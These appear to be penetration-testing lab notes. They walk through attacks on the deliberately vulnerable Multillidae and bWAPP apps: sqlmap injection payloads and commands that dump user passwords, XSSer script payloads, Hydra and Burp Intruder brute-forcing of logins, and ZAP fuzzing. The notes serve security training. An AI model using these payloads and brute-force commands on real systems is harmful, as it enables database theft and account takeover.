🔬Web App Attacks
Passive Crawling - Burp Suite
🔬 Passive Crawling with Burp Suite
Target IP:
192.230.181.3
Multillidae II
ip -br -c a
eth1@if203734 UP 192.230.181.2/24
nmap -sS -sV 192.230.181.3
Open the browser and navigate to
http://192.230.181.3/
Activate
FoxyProxy
Plugin
Start
BurpSuite
(set User options/Display/Look to Darcula and restart BurpSuite)Intercept the home page request and turn off the intercept
Check the
HTTP history
tabBrowse the Multillidae web app and Burp will crawl the visited pages


Check the
Target
tab for a Site mapAdd site to the Scope

SQL Injection - SQLMap
Target IP:
192.42.186.3
bWAPP
ip -br -c a
eth1@if178967 UP 192.42.186.2/24
nmap -sS -sV 192.42.186.3
Open the browser and navigate to
http://192.42.186.3/
, login withbee
:bug
, selectSQL Injection (GET/Search)
and click Hack buttonInput a string and search
http://192.42.186.3/sqli_1.php?title=hacking&action=search
Activate
FoxyProxy
PluginStart
BurpSuite
in Interception modeRefresh the page, intercept the request and copy the cookie
Cookie:
PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0

Run
sqlmap
, definingtitle
as the test parameter
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title

---
Parameter: title (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=hacking' AND (SELECT 1819 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(1819=1819,1))),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bLrY'='bLrY&action=search
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=hacking' AND (SELECT 1664 FROM (SELECT(SLEEP(5)))MSwT) AND 'jFDG'='jFDG&action=search
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: title=hacking' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a767171,0x7379784e74504d4e76744b6e4c524b4e516a4f4f7878676a51734e6d4c744d547450424844474f76,0x7171707071),NULL,NULL-- -&action=search
---
In BurpSuite, send the request to Repeater
Copy the first payload from SQLMap and paste it as part of the
title
parameter
hacking' AND (SELECT 1819 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(1819=1819,1))),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bLrY'='bLrY&action=search

Use
sqlmap
to get a list of tables for thebWAPP
database
# List databases
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs

sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables

Use
sqlmap
to get a list of columns in theusers
table of thebWAPP
database
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns

Dump
password
andemail
for admin from theusers
table
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump

Turn off Intercept mode in BurpSuite, navigate to
http://192.42.186.3/sqli_6.php
and turn back on Intercept mode.Search
example
string from the page and intercept itCopy to file the request and name the filerequest`

Use
sqlmap
with this request file
sqlmap -r request -p title

---
Parameter: title (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=example' AND (SELECT 9391 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9391=9391,1))),0x7162717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Yvps'='Yvps&action=search
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=example' AND (SELECT 6244 FROM (SELECT(SLEEP(5)))dWNC) AND 'Hfwn'='Hfwn&action=search
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: title=example' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7071,0x7463445853774f49666461525a4b446d4a624a706a414976706b56495977444675766767546d6347,0x7162717871),NULL-- -&action=search
---
In BurpSuite, send the request to Repeater
Try the proposed payloads from SQLMap

Change the request to pass
version()
function to the database

XSS Attack - XSSer
Target IP:
192.131.167.3
Multillidae II
ip -br -c a
eth1@if178967 UP 192.131.167.2/24
nmap -sS -sV 192.131.167.3
# If Firefox does not start, check the service and kill it
ps -e | grep firefox
<PID>
kill <PID>
Navigate to the XSS Reflected - DNS Lookup webpage:
http://192.131.167.3/index.php?page=dns-lookup.php
Enter any text and
Lookup DNS
The value is reflected back on the web page

Activate
FoxyProxy
PluginStart
BurpSuite
Enter any text and
Lookup DNS
and intercept the request inBurpSuite
Copy the payload and input
XSS
in the target_host

Use
xsser
to check the vulnerability
xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p
'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS'

xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p
'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --auto

Use a custom XSS payload
xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --Fp "<script>alert(1)</script>"

Copy the
Final Attack
payload and use it in the browser or BurpSuite to trigger the XSS attackhttp://192.131.167.3/index.php?page=dns-lookup.php&target_host=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&dns-lookup-php-submit-button=Lookup+DNS


Perform an XSS Poll Question attack over
GET
requesthttp://192.131.167.3/index.php?page=user-poll.php
copy the
URL
, replace thenmap
value withXSS
and pass it to XSSerhttp://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=2&user-poll-php-submit-button=Submit+Vote
xsser --url "http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=2&user-poll-php-submit-button=Submit+Vote"

xsser --url "http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=2&user-poll-php-submit-button=Submit+Vote" --Fp "<script>alert(1)</script>"

Open the
Final Attack
link in the browserhttp://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&initials=2&user-poll-php-submit-button=Submit+Vote

Authenticated XSS Attack - XSSer
🔬 Authenticated XSS Attack with XSSer
Target IP:
192.56.179.3
bWAPP
ip -br -c a
eth1@if178967 UP 192.56.179.2/24
nmap -sS -sV 192.56.179.3
Login with
bug
:bee
, select theHTML Injection - Reflected (GET)
bug and input any value. Copy the URLhttp://192.56.179.3/htmli_get.php?firstname=hi&lastname=hi&form=submit
Activate
FoxyProxy
Plugin, startBurpSuite
, refresh the webpage and copy theCookie
from the Proxy intercepted requestPHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0
Run the
xsser
tool byreplacing the
firstname
value string withXSS
feeding the Cookie
stop BurpSuite interceptor
xsser --url "http://192.56.179.3/htmli_get.php?firstname=XSS&lastname=hi&form=submit" --cookie="PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0"

xsser --url "http://192.56.179.3/htmli_get.php?firstname=XSS&lastname=hi&form=submit" --cookie="PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0" --Fp "<script>alert(1)</script>"

Attacking HTTP Login Form - Hydra
🔬 Attacking HTTP Login Form with Hydra
Target IP:
192.210.201.3
bWAPP
ip -br -c a
eth1@if178967 UP 192.210.201.2/24
nmap -sS -sV 192.210.201.3
Open the
http://192.210.201.3/login.php
page, view source code and check the parameters passed in the login form.

Prepare a usernames and a passwords list
echo -e "admin\nbee\nuser1\nuser2" > users
cat /root/Desktop/wordlists/100-common-passwords.txt > pws
echo "bug" >> pws
Use
hydra
to retrieve the credentials
hydra -L users -P pws 192.210.201.3 http-post-form "/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid credentials or user not activated!"

Attacking Basic Auth - BurpSuite
🔬 Attacking Basic Auth with Burp Suite
Target IP:
192.190.241.3
bWAPP
ip -br -c a
eth1@if178967 UP 192.190.241.2/24
nmap -sS -sV 192.190.241.3
Open Firefox, activate
FoxyProxy
Plugin, startBurpSuite
, openhttp://192.190.241.3/basic
and intercepted the request. Forward the request, input some data and intercept the request./basic
directory uses Basic Authsend the request to Intruder

Navigate to Intruder - Positions tab
Decode the
base64
string, it will becometest:test
, like the input data from the login form

Replace the credentials with a parameter to be substituted like
§credentials§

In the Payload Options, Load the
/root/Desktop/wordlists/100-common-passwords.txt:
listIn the Payload Processing -
Add prefix
rule, and inputadmin:
to append it to all the passwordsAdd a
Encode - Base64-encode
rule too
Start the attack
Check the entry result with status code
301
Send to Decoder the
Authorization: Basic
valueCheck the BurpSuite Decoder tab

Decoded as base64 string is
admin:cookie1

Turn off BurpSuite interceptor, open the web page and insert the found credentials
🚩 The flag is
d25db4ce54b60b49dfd7b32c52ed8d26

Attacking HTTP Login Form - ZAProxy
🔬 Attacking HTTP Login Form with ZAProxy
Target IP:
192.145.79.3
bWAPP
ip -br -c a
eth1@if178967 UP 192.145.79.2/24
nmap -sS -sV 192.145.79.3
Open the
owasp-zap
tool, Manual Explore, input the URL and launch browserhttp://192.145.79.3
Attempt login with bad credentials. The website will be added to the sitemap inside
ZAP

Right click on the
POST
request and select Fuzz...

Select the input username, click the Add button, Add again and input the payloads for username. Confirm with OK

Select the input password and do the same thing with a list of possible password

Start Fuzzer to start the attack and check the results and the
302
response


Last updated
Was this helpful?